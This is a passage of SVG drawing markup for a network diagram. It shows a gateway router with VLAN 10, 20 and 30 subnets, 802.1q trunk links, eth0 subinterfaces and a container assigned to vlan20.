font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="60" y="12">1q</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="77" y="12">trunk</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,282,8)"><g><g transform="translate(0,0) scale(0.6083333333333336,0.6104050109462419)"><g><g><path fill="#3966A0" stroke="rgb(0,0,0)" d="M 102.635 0 C 93.815 0 86.371 6.797 85.395 15.43 L 4.554 15.43 C 2.043 15.431 0 17.473 0 19.984 L 0 53.338 C 0 55.849 2.043 57.892 4.554 57.892 L 8.016 57.892 L 8.016 65.776 L 96.471 65.776 L 96.471 57.892 L 99.672 57.892 C 102.184 57.892 104.227 55.849 104.227 53.338 L 104.227 34.655 C 107.211 34.382 109.971 33.334 112.331 31.735 L 112.331 31.735 C 112.785 31.428 113.223 31.1 113.643 30.753 C 113.655 30.744 113.665 30.734 113.676 30.725 C 114.093 30.38 114.492 30.017 114.875 29.635 C 114.875 29.635 114.887 29.623 114.893 29.617 C 118.039 26.471 120 22.143 120 17.365 C 120 7.79 112.21 0 102.635 0 Z" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 102.688 3.191 C 94.836 3.191 88.45 9.579 88.45 17.43 C 88.45 25.281 94.838 31.669 102.688 31.669 C 110.54 31.669 116.926 25.281 116.926 17.43 C 116.926 9.579 110.539 3.191 102.688 3.191 Z M 97.377 20.901 C 97.118 20.901 96.859 20.802 96.662 20.605 C 96.267 20.21 96.267 19.569 96.662 19.174 L 97.412 18.424 L 91.228 18.424 C 90.669 18.424 90.216 17.971 90.216 17.412 C 90.216 16.853 90.67 16.4 91.229 16.4 L 97.414 16.4 L 96.699 15.686 C 96.303 15.291 96.303 14.65 96.699 14.255 C 97.095 13.86 97.735 13.86 98.13 14.255 L 100.571 16.696 C 100.665 16.79 100.739 16.902 100.791 17.026 C 100.894 17.273 100.894 17.552 100.791 17.799 C 100.739 17.924 100.665 18.036 100.571 18.129 L 98.093 20.605 C 97.895 20.802 97.637 20.901 97.377 20.901 Z M 105.863 25.522 L 103.422 27.963 C 103.225 28.161 102.965 28.259 102.707 28.259 C 102.698 28.259 102.689 28.254 102.68 28.254 C 102.671 28.254 102.663 28.259 102.655 28.259 C 102.305 28.259 102.012 28.07 101.83 27.801 L 99.515 25.484 C 99.119 25.089 99.119 24.448 99.515 24.053 C 99.91 23.658 100.55 23.658 100.945 24.053 L 101.644 24.752 L 101.644 9.174 L 100.945 9.873 C 100.748 10.071 100.488 10.169 100.23 10.169 C 99.97 10.169 99.711 10.07 99.515 9.873 C 99.119 9.478 99.119 8.837 99.515 8.442 L 101.954 6 C 102.35 5.605 102.988 5.605 103.385 6 L 105.864 8.478 C 106.26 8.873 106.26 9.514 105.864 9.909 C 105.667 10.107 105.408 10.205 105.149 10.205 C 104.889 10.205 104.63 10.106 104.434 9.909 L 103.667 9.143 L 103.667 24.857 L 104.434 24.091 C 104.829 23.696 105.468 23.696 105.864 24.091 C 106.258 24.486 106.258 25.126 105.863 25.522 Z M 114.148 18.46 L 107.964 18.46 L 108.677 19.174 C 109.073 19.569 109.073 20.21 108.677 20.605 C 108.48 20.803 108.22 20.901 107.961 20.901 C 107.702 20.901 107.442 20.802 107.246 20.605 L 104.808 18.165 C 104.713 18.072 104.64 17.959 104.587 17.835 C 104.485 17.588 104.485 17.309 104.587 17.062 C 104.64 16.937 104.713 16.825 104.808 16.732 L 107.284 14.255 C 107.68 13.86 108.32 13.86 108.715 14.255 C 109.11 14.65 109.11 15.291 108.715 15.686 L 107.964 16.437 L 114.149 16.437 C 114.708 16.437 115.161 16.89 115.161 17.449 C 115.16 18.008 114.707 18.46 114.148 18.46 Z" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 80.533 36.476 A 3.247 3.247 0 1 0 80.53299837650013 36.47924699945883 Z" opacity="0.5" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 9.278 35.006 L 20.39 35.006 L 20.39 24 L 9.278 24 L 9.278 35.006 Z M 10.929 25.567 L 18.819 25.567 L 18.819 31.173 L 16.536 31.173 L 16.536 33.456 L 13.213 33.456 L 13.213 31.173 L 10.93 31.173 L 10.929 25.567 L 10.929 25.567 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 24.253 35.015 L 35.365 35.015 L 35.365 24.009 L 24.253 24.009 L 24.253 35.015 Z M 25.904 25.576 L 33.794 25.576 L 33.794 31.182 L 31.51 31.182 L 31.51 33.465 L 28.187 33.465 L 28.187 31.182 L 25.904 31.182 L 25.904 25.576 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 50.3 24.009 L 39.188 24.009 L 39.188 35.014 L 50.3 35.014 L 50.3 24.009 Z M 48.729 31.173 L 46.446 31.173 L 46.446 33.456 L 43.123 33.456 L 43.123 31.173 L 40.84 31.173 L 40.84 25.567 L 48.73 25.567 L 48.729 31.173 L 48.729 31.173 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 54.123 35.023 L 65.234 35.023 L 65.234 24.018 L 54.123 24.018 L 54.123 35.023 Z M 55.774 25.567 L 63.664 25.567 L 63.664 31.173 L 61.38 31.173 L 61.38 33.456 L 58.057 33.456 L 58.057 31.173 L 55.774 31.173 L 55.774 25.567 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 9.278 49.95 L 20.39 49.95 L 20.39 38.944 L 9.278 38.944 L 9.278 49.95 Z M 10.929 40.502 L 18.819 40.502 L 18.819 46.108 L 16.536 46.108 L 16.536 48.391 L 13.213 48.391 L 13.213 46.108 L 10.93 46.108 L 10.929 40.502 L 10.929 40.502 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 24.253 49.958 L 35.365 49.958 L 35.365 38.953 L 24.253 38.953 L 24.253 49.958 Z M 25.904 40.52 L 33.794 40.52 L 33.794 46.126 L 31.51 46.126 L 31.51 48.408 L 28.187 48.408 L 28.187 46.126 L 25.904 46.126 L 25.904 40.52 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 39.228 49.966 L 50.34 49.966 L 50.34 38.962 L 39.228 38.962 L 39.228 49.966 Z M 40.839 40.511 L 48.729 40.511 L 48.729 46.117 L 46.446 46.117 L 46.446 48.4 L 43.123 48.4 L 43.123 46.117 L 40.84 46.117 L 40.839 40.511 L 40.839 40.511 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 54.123 49.966 L 65.234 49.966 L 65.234 38.962 L 54.123 38.962 L 54.123 49.966 Z M 55.774 40.511 L 63.664 40.511 L 63.664 46.117 L 61.38 46.117 L 61.38 48.4 L 58.057 48.4 L 58.057 46.117 L 55.774 46.117 L 55.774 40.511 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 11.504 57.898 L 92.919 57.898 Q 92.919 57.898 92.919 57.898 L 92.919 62.69 Q 92.919 62.69 92.919 62.69 L 11.504 62.69 Q 11.504 62.69 11.504 62.69 L 11.504 57.898 Q 11.504 57.898 11.504 57.898 Z" opacity="0.7" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 85.525 18.936 L 5.082 18.936 C 4.255 18.936 3.582 19.609 3.582 20.436 L 3.582 53.397 C 3.582 54.224 4.255 54.897 5.082 54.897 L 11.504 54.897 L 92.919 54.897 L 99.082 54.897 C 99.909 54.897 100.582 54.224 100.582 53.397 L 100.582 34.526 C 92.561 33.543 86.232 27.039 85.525 18.936 Z M 20.389 49.95 L 9.278 49.95 L 9.278 38.944 L 20.39 38.944 L 20.389 49.95 L 20.389 49.95 Z M 20.389 35.006 L 9.278 35.006 L 9.278 24 L 20.39 24 L 20.389 35.006 L 20.389 35.006 Z M 35.365 49.958 L 24.253 49.958 L 24.253 38.953 L 35.365 38.953 L 35.365 49.958 Z M 35.365 35.015 L 24.253 35.015 L 24.253 24.009 L 35.365 24.009 L 35.365 35.015 Z M 39.188 24.009 L 50.3 24.009 L 50.3 35.014 L 39.188 35.014 L 39.188 24.009 Z M 50.34 49.966 L 39.228 49.966 L 39.228 38.962 L 50.34 38.962 L 50.34 49.966 Z M 65.234 49.966 L 54.123 49.966 L 54.123 38.962 L 65.234 38.962 L 65.234 49.966 Z M 65.234 35.023 L 54.123 35.023 L 54.123 24.018 L 65.234 24.018 L 65.234 35.023 Z M 77.286 39.723 C 75.493 39.723 74.039 38.269 74.039 36.476 C 74.039 34.683 75.493 33.229 77.286 33.229 C 79.079 33.229 80.533 34.683 80.533 36.476 C 80.533 38.269 79.08 39.723 77.286 39.723 Z M 89.541 39.723 C 87.748 39.723 86.294 38.269 86.294 36.476 C 86.294 34.683 87.748 33.229 89.541 33.229 C 91.334 33.229 92.788 34.683 92.788 36.476 C 92.787 38.269 91.334 39.723 89.541 39.723 Z" opacity="0.93" stroke-opacity="0" stroke-miterlimit="10"/></g></g></g></g></g><g transform="matrix(1,0,0,1,250,51)"><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="140" height="70" fill-opacity="0"/></g></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="140" height="14" fill-opacity="0"/></g></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="140" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="12">Network</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="47" y="12">Router</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="83" y="12"> (</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="91" y="12">gateway</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="135" y="12">)</text></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="140" height="14" fill-opacity="0"/></g></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="127" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="26">vlan10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="35" y="26"> -</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="46" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="69" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="89" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="93" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="99" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="103" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="109" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="113" y="26">24</text></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="140" height="14" fill-opacity="0"/></g></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="47" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="40">vlan20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="35" y="40"> -&#160;</text></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="46" y="28" width="74" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="46" y="40">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="40">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="69" y="40">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="83" y="40">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="86" y="40">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="93" y="40">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="96" y="40">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="103" y="40">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="106" y="40">24</text></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="140" height="14" fill-opacity="0"/></g></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="47" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="54">vlan30</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="35" y="54"> -&#160;</text></g><g transform="translate(92,238) matrix(1,0,0,1,0,0) translate(-92,-238)"><g><rect fill="rgb(0,0,0)" stroke="none" x="46" y="42" width="61" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="46" y="54">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="59" y="54">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="54">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="69" y="54">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="73" y="54">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="79" y="54">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="83" y="54">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="89" y="54">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="93" y="54">16</text></g></g><g transform="matrix(1,0,0,1,48,60)"><g transform="translate(0,0)"><g transform="translate(-62,-55) translate(14,-5) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#e06666" d="M 54 66 L 54 79 Q 54 89 64 89 L 78 89 Q 88 89 88 99 L 88 112" stroke-miterlimit="10" stroke-width="5"/></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,12.805718530101615,11.940280333547719)"><g><g transform="translate(0,0) scale(0.8417223432141461,0.83)"><g><g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 52.371 16.22 L -1.393 16.22 L -1.393 99.52 L 52.371 99.52" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 52.371 99.52 L 69.07 82.82 L 69.07 -0.48 L 19.98 -0.48 L -1.393 16.22 L 52.371 16.22 L 52.371 99.52 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="rgb(0,0,0)" stroke="#FFFFFF" d="M 52.371 16.22 L 69.07 -0.48" fill-opacity="0" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="rgb(0,0,0)" stroke="#FFFFFF" d="M 25.3 16.22 L 25.3 99.52" fill-opacity="0" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="rgb(0,0,0)" stroke="#FFFFFF" d="M 26.149 16.22 L 44.316 -0.48" fill-opacity="0" stroke-miterlimit="10" stroke-width="1.3594"/></g></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 3.263 23.823 L 21.317 23.823 Q 21.317 23.823 21.317 23.823 L 21.317 34.868 Q 21.317 34.868 21.317 34.868 L 3.263 34.868 Q 3.263 34.868 3.263 34.868 L 3.263 23.823 Q 3.263 23.823 3.263 23.823 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 29.156 23.823 L 47.207 23.823 Q 47.207 23.823 47.207 23.823 L 47.207 34.868 Q 47.207 34.868 47.207 34.868 L 29.156 34.868 Q 29.156 34.868 29.156 34.868 L 29.156 23.823 Q 29.156 23.823 29.156 23.823 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 3.263 64.604 L 21.317 64.604 Q 21.317 64.604 21.317 64.604 L 21.317 75.648 Q 21.317 75.648 21.317 75.648 L 3.263 75.648 Q 3.263 75.648 3.263 75.648 L 3.263 64.604 Q 3.263 64.604 3.263 64.604 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 29.156 64.604 L 47.207 64.604 Q 47.207 64.604 47.207 64.604 L 47.207 75.648 Q 47.207 75.648 47.207 75.648 L 29.156 75.648 Q 29.156 75.648 29.156 75.648 L 29.156 64.604 Q 29.156 64.604 29.156 64.604 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 3.263 82.445 L 21.317 82.445 Q 21.317 82.445 21.317 82.445 L 21.317 93.49 Q 21.317 93.49 21.317 93.49 L 3.263 93.49 Q 3.263 93.49 3.263 93.49 L 3.263 82.445 Q 3.263 82.445 3.263 82.445 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 29.156 82.445 L 47.207 82.445 Q 47.207 82.445 47.207 82.445 L 47.207 93.49 Q 47.207 93.49 47.207 93.49 L 29.156 93.49 Q 29.156 93.49 29.156 93.49 L 29.156 82.445 Q 29.156 82.445 29.156 82.445 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g></g></g></g></g><g transform="matrix(1,0,0,1,66,73)"><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="41" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="8" y="12">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="35" y="12">10</text></g></g><g transform="matrix(1,0,0,1,67,52)"><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="41" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="8" y="12">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="35" y="12">20</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,7.386363636363733,108.14285409109937)"><g><g transform="translate(0,0) scale(1.7571428571428573,2.3636363636363638)"><g><g><g><path fill="#999999" stroke="rgb(0,0,0)" d="M 58.97 19.094 C 58.977 18.895 59 18.7 59 18.5 C 59 8.283 50.717 0 40.5 0 C 33.11 0 26.751 4.344 23.787 10.607 C 22.275 9.593 20.458 9 18.5 9 C 13.5 9 9.41 12.866 9.037 17.771 C 3.778 19.616 0 24.61 0 30.5 C 0 37.787 5.778 43.71 13 43.975 L 13 44 L 58 44 L 58 43.975 C 64.671 43.71 70 38.235 70 31.5 C 70 25.095 65.18 19.822 58.97 19.094 Z M 58 41.975 L 58 42 L 13 42 L 13 41.975 C 6.883 41.711 2 36.683 2 30.5 C 2 24.994 5.872 20.398 11.039 19.271 C 11.013 19.017 11 18.76 11 18.5 C 11 14.357 14.358 11 18.5 11 C 21.017 11 23.239 12.244 24.6 14.146 C 26.512 7.15 32.897 2 40.5 2 C 49.613 2 57 9.388 57 18.5 C 57 19.353 56.914 20.183 56.79 21 L 58 21 L 58 21.025 C 63.565 21.288 68 25.87 68 31.5 C 68 37.13 63.565 41.712 58 41.975 Z" stroke-opacity="0" stroke-miterlimit="10"/></g></g></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,170.65404609475036,143.99656534721677)"><g><g transform="translate(0,0) scale(0.44395492957746485,0.26378466557911767)"><g><path fill="url(#SeALyqvahCFZ)" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.2524809014999616,3.790970933828097)"><path fill="none" stroke="none" d="M 0 0 L 44.395492957746484 0 Q 44.395492957746484 0 44.395492957746484 0 L 44.395492957746484 26.378466557911768 Q 44.395492957746484 26.378466557911768 44.395492957746484 26.378466557911768 L 0 26.378466557911768 Q 0 26.378466557911768 0 26.378466557911768 L 0 0 Q 0 0 0 0 Z"/><path fill="url(#SeALyqvahCFZ)" stroke="#6fa8dc" d="M 0 0 M 0 0 L 44.395492957746484 0 Q 44.395492957746484 0 44.395492957746484 0 L 44.395492957746484 26.378466557911768 Q 44.395492957746484 26.378466557911768 44.395492957746484 26.378466557911768 L 0 26.378466557911768 Q 0 26.378466557911768 0 26.378466557911768 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,174.53252582967698,139.4965653472169)"><g transform="translate(0,0)"><g transform="translate(-177.7573249679898,-143.64485245977795) translate(3.224799138312818,4.148287112561064) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 179.03252582967698 143.9965653472169 L 179.03252582967698 170.37503190512842" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,202.11478334058148,139.4965653472165)"><g transform="translate(0,0)"><g transform="translate(-207.50230524967998,-145.05170400953324) translate(5.387521909098496,5.55513866231675) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 206.61478334058148 143.9965653472165 L 206.61478334058148 170.37503190512865" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,188.35179257362358,139.49656534721677)"><g transform="translate(0,0)"><g transform="translate(-191.5199277848912,-145.05170400953324) translate(3.168135211267611,5.555138662316466) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 192.85179257362358 143.99656534721677 L 192.85179257362358 170.37503190512854" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,141,177)"><g transform="translate(18,28) matrix(1,0,0,1,0,0) translate(-18,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="104" height="28" fill-opacity="0"/></g></g><g transform="translate(18,28) matrix(1,0,0,1,0,0) translate(-18,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="104" height="14" fill-opacity="0"/></g></g><g transform="translate(18,28) matrix(1,0,0,1,0,0) translate(-18,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="103" height="14" fill-opacity="0"/></g></g><g transform="translate(18,28) matrix(1,0,0,1,0,0) translate(-18,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="103" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="1" y="12">container2</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="12"> -</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="68" y="12">vlan20</text></g><g transform="translate(18,28) matrix(1,0,0,1,0,0) translate(-18,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="104" height="14" fill-opacity="0"/></g></g><g transform="translate(18,28) matrix(1,0,0,1,0,0) translate(-18,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="14" width="74" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="16" y="26">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="36" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="39" y="26">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="52" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="56" 